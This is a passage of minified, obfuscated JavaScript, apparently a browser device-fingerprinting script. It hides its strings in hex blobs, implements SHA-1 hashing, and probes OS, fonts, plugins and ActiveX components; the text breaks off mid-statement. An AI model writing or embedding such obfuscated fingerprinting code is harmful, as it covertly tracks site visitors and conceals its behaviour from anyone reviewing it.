td_x(){if(!Array.prototype.indexOf){td_3v=td_Z;}else{td_3v=td_k; }if(typeof String.prototype.trim!==td_2V.tdz_7a91aafff59e4dc0b6032cc904041062.td_f(0,8)){td_3Z=td_w;}else{td_3Z=td_q;}if(typeof Date.now===[][[]]+""){td_E=td_Q;}}function td_1n(td_H){if(typeof document.readyState!==[][[]]+""&&typeof document.readyState!==td_2V.tdz_7a91aafff59e4dc0b6032cc904041062.td_f(8,7)&&document.readyState===td_2V.tdz_7a91aafff59e4dc0b6032cc904041062.td_f(15,8)){td_H(); }else{if(typeof document.readyState===[][[]]+""){setTimeout(td_H,300);}else{var td_u=200;var td_G;if(typeof window!==[][[]]+""&&typeof window!==td_2V.tdz_7a91aafff59e4dc0b6032cc904041062.td_f(8,7)&&window!==null){td_G=window; }else{td_G=document.body;}if(td_G.addEventListener){td_G.addEventListener(Number(343388).toString(25),function(){setTimeout(td_H,td_u);},false);}else{if(td_G.attachEvent){td_G.attachEvent(td_2V.tdz_7a91aafff59e4dc0b6032cc904041062.td_f(23,6),function(){setTimeout(td_H,td_u); },false);}else{var td_c=td_G.onload;td_G.onload=new function(){var td_O=true;if(td_c!==null&&typeof td_c===td_2V.tdz_7a91aafff59e4dc0b6032cc904041062.td_f(0,8)){td_O=td_c();}setTimeout(td_H,td_u);td_G.onload=td_c; return td_O;};}}}}}function td_P(){if(typeof td_2I!==[][[]]+""){td_2I();}if(typeof td_3X!==[][[]]+""){td_3X();}if(typeof td_3G!==[][[]]+""){td_3G();}if(typeof td_1X!==[][[]]+""){td_1X(td_1O);}if(typeof td_3S!==[][[]]+""){td_3S(); }if(typeof td_3b!==[][[]]+""){td_3b();}if(typeof td_2A!==[][[]]+""){td_2A.start();}}function td_0r(){td_2V.td_2c();td_2V.td_2g(document);td_0Q.td_1L();td_x();td_1n(td_P);}var td_2v={};td_2v.td_0U=function(td_w,td_K){td_K=(typeof td_K===[][[]]+"")?true:td_K;if(td_K){td_w=td_2W.td_0L(td_w);}var td_O=[1518500249,1859775393,2400959708,3395469782];td_w+=String.fromCharCode(128); var td_z=td_w.length/4+2;var td_D=Math.ceil(td_z/16);var td_y=new Array(td_D);for(var td_s=0;td_s<td_D;td_s++){td_y[td_s]=new Array(16);for(var td_x=0;td_x<16;td_x++){td_y[td_s][td_x]=(td_w.charCodeAt(td_s*64+td_x*4)<<24)|(td_w.charCodeAt(td_s*64+td_x*4+1)<<16)|(td_w.charCodeAt(td_s*64+td_x*4+2)<<8)|(td_w.charCodeAt(td_s*64+td_x*4+3)); }}td_y[td_D-1][14]=((td_w.length-1)*8)/Math.pow(2,32);td_y[td_D-1][14]=Math.floor(td_y[td_D-1][14]);td_y[td_D-1][15]=((td_w.length-1)*8)&4294967295;var td_r=1732584193;var td_q=4023233417;var td_B=2562383102; var td_h=271733878;var td_a=3285377520;var td_C=new Array(80);var td_Q,td_m,td_F,td_g,td_A;for(var td_s=0;td_s<td_D;td_s++){for(var td_c=0;td_c<16;td_c++){td_C[td_c]=td_y[td_s][td_c];}for(var td_c=16;td_c<80; td_c++){td_C[td_c]=td_2v.td_3W(td_C[td_c-3]^td_C[td_c-8]^td_C[td_c-14]^td_C[td_c-16],1);}td_Q=td_r;td_m=td_q;td_F=td_B;td_g=td_h;td_A=td_a;for(var td_c=0;td_c<80;td_c++){var td_W=Math.floor(td_c/20);var td_S=(td_2v.td_3W(td_Q,5)+td_2v.f(td_W,td_m,td_F,td_g)+td_A+td_O[td_W]+td_C[td_c])&4294967295; td_A=td_g;td_g=td_F;td_F=td_2v.td_3W(td_m,30);td_m=td_Q;td_Q=td_S;}td_r=(td_r+td_Q)&4294967295;td_q=(td_q+td_m)&4294967295;td_B=(td_B+td_F)&4294967295;td_h=(td_h+td_g)&4294967295;td_a=(td_a+td_A)&4294967295; }return td_2v.td_3T(td_r)+td_2v.td_3T(td_q)+td_2v.td_3T(td_B)+td_2v.td_3T(td_h)+td_2v.td_3T(td_a);};td_2v.f=function(td_a,td_B,td_g,td_C){switch(td_a){case 0:return(td_B&td_g)^(~td_B&td_C);case 1:return td_B^td_g^td_C; case 2:return(td_B&td_g)^(td_B&td_C)^(td_g&td_C);case 3:return td_B^td_g^td_C;}};td_2v.td_3W=function(td_A,td_k){return(td_A<<td_k)|(td_A>>>(32-td_k));};td_2v.td_3T=function(td_c){var td_p="",td_e;for(var td_C=7; td_C>=0;td_C--){td_e=(td_c>>>(td_C*4))&15;td_p+=td_e.toString(16);}return td_p;};var td_2W={};td_2W.td_0L=function(td_p){var td_z=td_p.replace(/[\u0080-\u07ff]/g,function(td_R){var td_w=td_R.charCodeAt(0); return String.fromCharCode(192|td_w>>6,128|td_w&63);});td_z=td_z.replace(/[\u0800-\uffff]/g,function(td_V){var td_k=td_V.charCodeAt(0);return String.fromCharCode(224|td_k>>12,128|td_k>>6&63,128|td_k&63); });return td_z;};function td_3H(td_t){return td_2v.td_0U(td_t,true);}td_2V.tdz_d65284dc6df34c39828ee5a274f64094=new td_2V.td_1r("\x64\x36\x35\x32\x38\x34\x64\x63\x36\x64\x66\x33\x34\x63\x33\x39\x38\x32\x38\x65\x65\x35\x61\x32\x37\x34\x66\x36\x34\x30\x39\x34\x31\x36\x35\x61\x34\x36\x35\x66\x35\x64\x34\x37\x31\x37\x30\x32\x35\x31\x30\x31\x30\x39\x35\x64\x35\x39\x30\x36\x34\x30\x34\x61\x35\x39\x35\x35\x35\x64"); var td_2V=td_2V||{};function td_vL(td_hT){if(td_hT.data===td_2V.tdz_d65284dc6df34c39828ee5a274f64094.td_f(0,3)){td_0H();}}if(window.addEventListener){window.addEventListener(td_2V.tdz_d65284dc6df34c39828ee5a274f64094.td_f(3,7),td_vL,false); }else{window.attachEvent(td_2V.tdz_d65284dc6df34c39828ee5a274f64094.td_f(10,9),td_vL);}td_2V.tdz_47e6716612a64e28b13a5974ac11001b=new td_2V.td_1r("\x34\x37\x65\x36\x37\x31\x36\x36\x31\x32\x61\x36\x34\x65\x32\x38\x62\x31\x33\x61\x35\x39\x37\x34\x61\x63\x31\x31\x30\x30\x31\x62\x34\x33\x35\x65\x30\x62\x35\x32\x35\x38\x34\x36\x34\x35\x34\x31\x35\x38\x35\x63\x30\x38\x34\x36\x35\x63\x30\x61\x35\x63\x35\x64\x34\x64\x35\x38\x34\x33\x30\x65\x35\x31\x35\x30\x35\x38\x34\x37\x30\x63\x30\x32\x35\x32\x35\x65\x35\x32\x35\x61\x35\x34\x30\x31\x34\x30\x35\x62\x30\x63\x35\x38\x34\x32\x34\x39\x35\x37\x35\x38\x35\x35\x34\x30\x30\x65\x35\x66\x35\x30\x30\x30\x34\x61\x34\x38\x30\x65\x35\x65\x34\x31\x30\x34\x34\x37\x35\x30\x35\x32"); function td_Sz(td_3h){var td_H0=td_3h.toLowerCase();if(td_H0===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(0,7)){td_H0=td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(7,3);}else{if(td_H0===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(10,11)||td_H0===Number(333541).toString(26)){td_H0=td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(21,3); }}this.os_name=td_H0;this._eq=function(td_3h){return(td_3h===this.os_name);};this._ne=function(td_3h){return(td_3h!==this.os_name);};this._gt=function(td_3h){return(this.os_name>td_3h);};this._ge=function(td_3h){return(this.os_name>=td_3h); };this._lt=function(td_3h){return(this.os_name<td_3h);};this._le=function(td_3h){return(this.os_name<=td_3h);};this._in=function(td_3h){var td_q2=(td_H0.constructor===String?[td_H0]:td_H0);var td_R7;for(td_R7=0; td_R7<td_q2.length;td_R7++){if(this.os_name===td_q2[td_R7]){return true;}}return false;};this.getFontsList=function(){if(this.os_name===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(24,3)){return(typeof(td_2b)===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(27,6)?td_2b:[]); }if(this.os_name===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(33,5)){return(typeof(td_3w)===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(27,6)?td_3w:[]);}if(this.os_name===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(7,3)){return(typeof(td_1i)===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(27,6)?td_1i:[]); }if(this.os_name===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(21,3)){return(typeof(td_1c)===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(27,6)?td_1c:[]);}if(this.os_name===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(38,7)){return(typeof(td_3z)===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(27,6)?td_3z:[]); }else{return[];}};}function td_f9(td_2h){var td_dg=td_2h.toLowerCase();if(td_dg===td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(45,8)){td_dg=td_2V.tdz_47e6716612a64e28b13a5974ac11001b.td_f(53,2);}this.browser_name=td_dg; this._eq=function(td_2h){return(td_2h===this.browser_name);};this._ne=function(td_2h){return(td_2h!==this.browser_name);};this._in=function(td_2h){var td_P3=(td_2h.constructor===String?[td_2h]:td_2h);var td_i8; for(td_i8=0;td_i8<td_P3.length;td_i8++){if(this.browser_name===td_P3[td_i8]){return true;}}return false;};}function td_FQ(td_xK){this.version=td_xK;this._eq=function(td_Ds){return(this.version===parseInt(td_Ds)); };this._ne=function(td_Aj){return(this.version!==parseInt(td_Aj));};this._gt=function(td_g1){return(this.version>parseInt(td_g1));};this._ge=function(td_P9){return(this.version>=parseInt(td_P9));};this._lt=function(td_mh){return(this.version<parseInt(td_mh)); };this._le=function(td_vK){return(this.version<=parseInt(td_vK));};}td_2V.tdz_0d937952376c45a6843eb40ff4540d57=new td_2V.td_1r("\x30\x64\x39\x33\x37\x39\x35\x32\x33\x37\x36\x63\x34\x35\x61\x36\x38\x34\x33\x65\x62\x34\x30\x66\x66\x34\x35\x34\x30\x64\x35\x37\x35\x36\x30\x35\x35\x35\x34\x30\x35\x32\x35\x38\x34\x35\x34\x32\x35\x66\x35\x65\x35\x35\x30\x32\x34\x30\x35\x63\x30\x65\x35\x38\x31\x37\x34\x63\x31\x65\x31\x36\x30\x61\x35\x62\x35\x33\x30\x64\x31\x31\x35\x35\x34\x33\x35\x31\x31\x64\x30\x32\x35\x39\x35\x36\x34\x33\x30\x63\x35\x38\x34\x33\x34\x37\x35\x35\x35\x63\x35\x31\x35\x32\x34\x33\x35\x66\x30\x63\x35\x61\x31\x61\x30\x37\x34\x33\x34\x63\x34\x31\x34\x31\x30\x30\x31\x31\x34\x34\x35\x63\x30\x37\x31\x35\x35\x63\x35\x34\x34\x34\x34\x30\x30\x38\x35\x63\x35\x34\x35\x31\x31\x30\x35\x30\x35\x63\x35\x39\x31\x36\x34\x64\x31\x66\x35\x65\x34\x37\x35\x61\x30\x32\x34\x64\x35\x30\x31\x33\x30\x34\x35\x39\x34\x34\x34\x33\x30\x39\x30\x62\x35\x37\x35\x31\x31\x32\x30\x66\x35\x62\x35\x62\x31\x62\x35\x31\x31\x37\x34\x64\x35\x36\x34\x30\x31\x34\x35\x35\x35\x61\x35\x34\x35\x38\x34\x31\x35\x62\x35\x63\x35\x39\x31\x39\x31\x33\x35\x30\x35\x33\x35\x39\x31\x38\x30\x38\x31\x62\x35\x66\x30\x34\x31\x36\x35\x31\x34\x32\x31\x30\x30\x66\x35\x30\x35\x30\x35\x62\x31\x66\x31\x35\x34\x30\x35\x65\x35\x33\x30\x66\x34\x64\x35\x61\x35\x61\x35\x63\x35\x34\x34\x32\x34\x33\x35\x62\x35\x66\x30\x30\x35\x35\x34\x31\x30\x38\x35\x39\x35\x36\x31\x62\x34\x62\x34\x38\x31\x33\x34\x31\x35\x39\x30\x35\x30\x64\x34\x30\x35\x63\x35\x39\x35\x35\x31\x34\x35\x39\x35\x36\x34\x39\x30\x31\x34\x62\x35\x61\x35\x61\x35\x38\x35\x32\x35\x37\x31\x63\x34\x66\x31\x62\x30\x65\x35\x35\x35\x36\x31\x31\x35\x37\x35\x31\x35\x61\x34\x37\x30\x63\x30\x66\x35\x35\x35\x37\x30\x33\x34\x39\x34\x63\x31\x38\x34\x35\x34\x35\x30\x64\x35\x36\x35\x63\x34\x34\x30\x64\x35\x34\x35\x36\x35\x36\x34\x39\x34\x35\x35\x65\x35\x61\x35\x34\x35\x37\x31\x37\x35\x64\x35\x61\x30\x66\x31\x39\x34\x30\x31\x39\x35\x37\x30\x63\x31\x30\x35\x31\x35\x33\x31\x32\x30\x39\x34\x36\x35\x34\x34\x34\x34\x30\x30\x38\x35\x63\x35\x34\x35\x31\x31\x30\x35\x30\x35\x63\x35\x39\x31\x36\x34\x33\x35\x63\x35\x37\x31\x39\x34\x34\x30\x64\x31\x39\x34\x37\x30\x34\x35\x37\x35\x34\x34\x34\x35\x66\x30\x34\x31\x62\x35\x31\x34\x32\x34\x62\x30\x63\x35\x35\x34\x33\x35\x35\x34\x33\x30\x37\x34\x37\x35\x65\x34\x30\x31\x30\x30\x63\x31\x64\x30\x37\x35\x38\x34\x35\x34\x32\x35\x66\x35\x65\x35\x35\x30\x32\x34\x30\x35\x63\x30\x65\x35\x38\x31\x37\x34\x63\x31\x65\x31\x33\x30\x65\x35\x37\x31\x64\x31\x36\x30\x61\x34\x31\x35\x32\x35\x64\x35\x65\x30\x35\x34\x35\x34\x37\x35\x63\x30\x64\x35\x61\x35\x32\x34\x33\x35\x30\x35\x61\x35\x63\x31\x63\x34\x66\x31\x62\x30\x37\x35\x31\x34\x33\x30\x30\x35\x61\x34\x65\x34\x36\x34\x62\x30\x63\x30\x66\x35\x35\x35\x37\x30\x33\x34\x39\x34\x37\x34\x33\x35\x33\x31\x64\x31\x63\x35\x38\x35\x62\x35\x39\x30\x39\x35\x38\x35\x34\x35\x32\x31\x36\x34\x36\x34\x34\x35\x34\x31\x63\x34\x65\x30\x65\x35\x38\x35\x34\x31\x31\x34\x36\x35\x34\x35\x64\x35\x30\x30\x34\x31\x36\x35\x64\x35\x66\x30\x38\x34\x39\x34\x63\x31\x38\x35\x65\x35\x31\x31\x32\x35\x34\x31\x61\x35\x31\x31\x34\x34\x39\x35\x66\x35\x32\x34\x64\x35\x34\x34\x32\x34\x33\x35\x62\x35\x66\x30\x30\x35\x35\x34\x31\x30\x38\x35\x39\x35\x36\x31\x62\x34\x62\x34\x38\x30\x38\x35\x35\x34\x36\x30\x37\x34\x62\x34\x32\x35\x38\x35\x35\x34\x30\x31\x34\x35\x39\x35\x65\x35\x33\x30\x35\x34\x64\x35\x61\x35\x38\x35\x37\x31\x61\x34\x61\x31\x65\x35\x64\x35\x37\x31\x35\x35\x35\x31\x38\x30\x33\x35\x33\x35\x39\x35\x61\x36\x30\x30\x64\x30\x64\x35\x37\x35\x62\x31\x31\x30\x37\x34\x32\x35\x30\x37\x32\x35\x63\x30\x35\x34\x36\x35\x66\x31\x65\x33\x37\x35\x31\x35\x63\x35\x34\x35\x32\x34\x32\x35\x33\x34\x35\x35\x32\x37\x30\x30\x66\x35\x35\x34\x36\x30\x39\x35\x37\x35\x34\x34\x33\x35\x32\x31\x63\x31\x31\x30\x32\x31\x63\x35\x36\x34\x61\x30\x36\x30\x34\x31\x38\x30\x30\x34\x30\x34\x33\x35\x32\x34\x32\x31\x37\x35\x30\x35\x63\x35\x39\x34\x65\x35\x38\x34\x32\x35\x66\x35\x36\x34\x66\x30\x36\x34\x36\x31\x62\x30\x65\x35\x35\x34\x30\x36\x34\x37\x37\x32\x33\x34\x63\x34\x34\x35\x34\x30\x30\x32\x35\x34\x30\x34\x37\x35\x38\x37\x31\x30\x37\x34\x37\x35\x38\x36\x30\x32\x30\x37\x66\x31\x64\x36\x37\x37\x64\x37\x33\x31\x63\x30\x32\x31\x39\x30\x37\x35\x37\x31\x61\x30\x35\x35\x36\x31\x38\x30\x38\x31\x62\x35\x66\x30\x34\x31\x36\x35\x31\x34\x32\x33\x37\x31\x33\x35\x64\x35\x36\x35\x66\x36\x34\x30\x64\x35\x38\x35\x32\x31\x65\x33\x35\x34\x63\x35\x61\x35\x34\x35\x32\x36\x31\x35\x62\x35\x65\x35\x32\x36\x35\x33\x34\x37\x37\x34\x31\x30\x64\x31\x38\x36\x62\x36\x33\x37\x30\x31\x31\x30\x65\x34\x37\x34\x34\x31\x34\x30\x66\x35\x61\x35\x32\x31\x61\x30\x38\x34\x61\x30\x32\x37\x36\x35\x33\x31\x30\x35\x30\x34\x35\x35\x32\x36\x31\x37\x61\x35\x30\x35\x39\x35\x32\x35\x35\x31\x37\x34\x34\x35\x39\x31\x34\x35\x31\x35\x31\x35\x61\x36\x63\x30\x33\x30\x65\x35\x35\x34\x33\x30\x65\x33\x38\x34\x34\x35\x39\x34\x31\x35\x37\x30\x64\x35\x62\x36\x38\x34\x37\x30\x64\x35\x37\x35\x37\x35\x38\x34\x65\x34\x36\x36\x64\x35\x65\x35\x32\x35\x32\x30\x61\x35\x35\x36\x61\x31\x31\x35\x61\x35\x39\x34\x64\x35\x36\x31\x37\x33\x63\x34\x34\x35\x63\x31\x33\x30\x31\x35\x64\x35\x62\x36\x62\x35\x31\x30\x30\x35\x61\x35\x35\x35\x35\x33\x62\x35\x38\x35\x30\x34\x35\x35\x36\x35\x37\x35\x33\x34\x37\x36\x39\x34\x36\x30\x66\x34\x31\x35\x32\x30\x38\x35\x38\x36\x37\x34\x35\x34\x36\x30\x63\x30\x31\x35\x66\x34\x34\x30\x66\x30\x62\x35\x31\x36\x62\x34\x34\x35\x63\x31\x31\x35\x32\x35\x65\x35\x65\x33\x62\x34\x61\x35\x62\x35\x38\x35\x61\x35\x65\x34\x35\x35\x32\x34\x31\x35\x33\x33\x64\x34\x34\x35\x39\x31\x34\x35\x31\x35\x31\x35\x61\x36\x63\x31\x37\x30\x37\x35\x35\x35\x63\x31\x36\x30\x61\x35\x35\x34\x63\x35\x31\x34\x32\x33\x61\x34\x35\x35\x62\x34\x35\x30\x33\x35\x30\x35\x64\x36\x38\x34\x66\x35\x39\x35\x31\x36\x63\x34\x37\x35\x61\x30\x32\x34\x64\x35\x30\x31\x33\x36\x38\x34\x38\x35\x38\x34\x36\x30\x32\x30\x62\x35\x61\x36\x66\x30\x32\x30\x33\x34\x32\x35\x34\x35\x38\x34\x36\x31\x36\x36\x62\x34\x37\x35\x63\x31\x31\x35\x65\x35\x61\x35\x39\x36\x36\x34\x36\x34\x34\x35\x34\x36\x38\x34\x30\x30\x61\x35\x31\x34\x32\x30\x34\x34\x34\x36\x36\x34\x34\x35\x66\x31\x30\x30\x35\x35\x64\x35\x65\x33\x39\x30\x63\x35\x35\x34\x33\x35\x35\x36\x65"); function td_fR(td_G8){var td_NX=td_G8.constructor==String?[td_G8]:td_G8;var td_tG=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_oB=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_XG; for(td_XG=0;td_XG<td_NX.length;td_XG++){var td_VJ=td_LQ[td_NX[td_XG]];if(td_VJ&&td_VJ.enabledPlugin){var td_Du=td_VJ.enabledPlugin;if(td_Du.name){td_tG=td_Du.name;}else{td_tG=Number(890830).toString(31); }td_oB=td_Du.description;break;}}return[td_tG,td_oB];}function td_kA(){var td_sw=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_E5=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(5,29),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(34,24)]); var td_rR=td_E5[0];var td_RE=td_E5[1];if(td_rR!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_rR!==Number(890830).toString(31)&&(/Flash/i).test(td_rR)){td_sw=Number(890830).toString(31);}if(td_sw===Number(890830).toString(31)&&td_RE){var td_NL=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(td_RE); if(td_NL){td_sw=td_NL[0];}}return td_sw;}function td_EH(){var td_lL=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_AN=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(58,22),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(80,15)]); var td_gF=td_AN[0];if(td_gF!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_gF!==Number(890830).toString(31)&&(/Windows.*Media.*Firefox Plugin.*/i).test(td_gF)){td_lL=Number(890830).toString(31); }return td_lL;}function td_Lt(){var td_l1=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_JV=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(95,15)]);var td_ly=td_JV[0];var td_hj=td_JV[1]; if(td_ly!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_ly!==Number(890830).toString(31)&&(/Adobe Acrobat/i).test(td_ly)){td_l1=Number(890830).toString(31);}if(td_l1===Number(890830).toString(31)&&td_hj){var td_Y0=/[\d][\d\.\_,-]*/.exec(td_hj); if(td_Y0){td_l1=td_Y0[0];}else{td_l1=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(110,9);}}return td_l1;}function td_Ta(){var td_hA=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);if(navigator.platform&&(/linux/i).test(navigator.platform)){td_hA=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); }else{var td_vi=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(119,15),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(134,29),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(163,16),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(179,17)]); var td_ym=td_vi[0];if(td_ym!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_ym!==Number(890830).toString(31)&&(/QuickTime.*(Plug-in|Plugin).*/i).test(td_ym)){td_hA=Number(890830).toString(31); var td_DA=/[\d][\d\.\_,-]*/.exec(td_ym);if(td_DA){td_hA=td_DA[0];}}}return td_hA;}function td_Ws(){var td_YA=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_OZ=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(196,22)]); var td_ua=td_OZ[0];var td_Dx=td_OZ[1];if(td_ua!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_ua!==Number(890830).toString(31)&&(/Shockwave for Director/i).test(td_ua)){td_YA=Number(890830).toString(31); }if(td_YA===Number(890830).toString(31)&&td_Dx){var td_sc=/[\d][\d\.\_,-]*/.exec(td_Dx);if(td_sc){td_YA=td_sc[0];}}return td_YA;}function td_Fg(){var td_s6=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); var td_vo=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(218,40)]);var td_T3=td_vo[0];var td_Xx=td_vo[1];if(td_T3!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_T3!==Number(890830).toString(31)&&(/RealPlayer.*Version.*/i).test(td_T3)){td_s6=Number(890830).toString(31); }if(td_s6===Number(890830).toString(31)&&td_Xx){var td_qk=/[\d][\d\.\_,-]*/.exec(td_Xx);if(td_qk){td_s6=td_qk[0];}else{td_s6=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(258,3);}}return td_s6;}function td_E4(){var td_Mi=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); var td_TM=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(261,24)]);var td_e7=td_TM[0];var td_ea=td_TM[1];if(td_e7!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_e7!==Number(890830).toString(31)&&(/VLC.*(Plug-in|Plugin).*/i).test(td_e7)){td_Mi=Number(890830).toString(31); }if(td_Mi===Number(890830).toString(31)&&td_ea){var td_Ks=/(Version) ([\d][\d\.]*[a-z]*)/.exec(td_ea);if(td_Ks){td_Mi=td_Ks[2];}}return td_Mi;}function td_b0(){var td_dd=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); var td_t8=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(285,22)]);var td_mp=td_t8[0];var td_fj=td_t8[1];if(td_mp!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_mp!==Number(890830).toString(31)&&(/DevalVR/i).test(td_mp)){td_dd=Number(890830).toString(31); }if(td_dd===Number(890830).toString(31)&&td_fj){var td_u0=/(Plugin) ([\d][\d\.\,]*)/.exec(td_fj);if(td_u0){td_dd=td_u0[2];}}return td_dd;}function td_W3(){var td_Ba=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); var td_s1=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(307,13),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(320,13)]);var td_C7=td_s1[0];var td_dl=td_s1[1];if(td_C7!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_C7!==Number(890830).toString(31)&&(/SVG Viewer/i).test(td_C7)){td_Ba=Number(890830).toString(31); }if(td_Ba===Number(890830).toString(31)&&td_dl){var td_Qg=/[\d][\d\.]*/.exec(td_dl);if(td_Qg){td_Ba=td_Qg[0];}}return td_Ba;}function td_eM(){var td_qh=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); var td_mS=td_fR([td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(333,25),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(358,21),td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(379,23)]);var td_Vc=td_mS[0]; var td_Lx=td_mS[1];if(td_Vc!==td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5)&&td_Vc!==Number(890830).toString(31)&&(/Java/i).test(td_Vc)){td_qh=Number(890830).toString(31);}if(td_qh===Number(890830).toString(31)&&td_Lx){var td_ZP=/[\d][\d\._]*/.exec(td_Lx); if(td_ZP){td_qh=td_ZP[0];}}return td_qh;}function td_pr(td_XE,td_X9){var td_mJ=null;var td_V2=false;try{td_mJ=new ActiveXObject(td_XE);td_V2=true;}catch(td_op){}if(typeof td_X9!==[][[]]+""){return td_V2; }return td_mJ;}function td_jp(){var td_Md=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(402,29);var td_JK,td_ob=null,td_ov=null,td_Qh=null;var td_er=15;var td_Vp=2;for(td_JK=td_er;td_JK>td_Vp;td_JK--){td_ov=td_pr(td_Md+"."+td_JK); if(td_ov){td_ob=td_JK.toString();break;}}if(td_ob==="6"){try{td_ov.AllowScriptAccess=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(431,6);}catch(td_EG){td_Qh=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(437,8); }}else{if(td_ov){try{td_Qh=td_ov.GetVariable(td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(445,8));var td_de=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(td_Qh);if(td_de){td_Qh=td_de[0];}else{td_Qh=Number(890830).toString(31); }}catch(td_EG){td_Qh=Number(890830).toString(31);}}}if(!td_Qh&&td_ob){td_Qh=td_ob;}if(!td_Qh){td_Qh=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);}return td_Qh;}function td_gK(){var td_lz=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(453,12); var td_kj=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_iL=td_pr(td_lz);if(td_iL){td_kj=td_iL.versionInfo;}return td_kj;}function td_qM(){var td_D1=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(465,11); var td_Ku=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(476,13);var td_ef;var td_ta=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5);var td_Zd=td_pr(td_Ku);if(!td_Zd){var td_SG=10;var td_WN=1;for(td_ef=td_SG; td_ef>td_WN;td_ef--){td_Zd=td_pr(td_D1+"."+td_ef);if(td_Zd){td_ta=td_ta.toString();break;}}if(!td_Zd){td_Zd=td_pr(td_D1+td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(489,2));if(td_Zd){td_ta=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(491,3); }}}else{td_ta=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(494,9);}return td_ta;}function td_av(){var td_Ro=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(503,19);var td_in=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5); var td_Yf=null;try{td_Yf=td_pr(td_Ro);}catch(td_oN){}if(td_Yf){if(td_Yf.QuickTimeVersion){td_in=td_Yf.QuickTimeVersion.toString(16);td_in=td_in.charAt(0)+"."+td_in.charAt(1)+"."+td_in.charAt(2);}else{td_in=Number(890830).toString(31); }}return td_in;}function td_hh(){var td_sZ=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(522,11);var td_Rk=td_2V.tdz_0d937952376c45a6843eb40ff4540d57.td_f(0,5),td_VY=null,td_bM;try{td_VY=td_pr(td_sZ).ShockwaveVersion(""); }catch(td_bM){}if(typeof 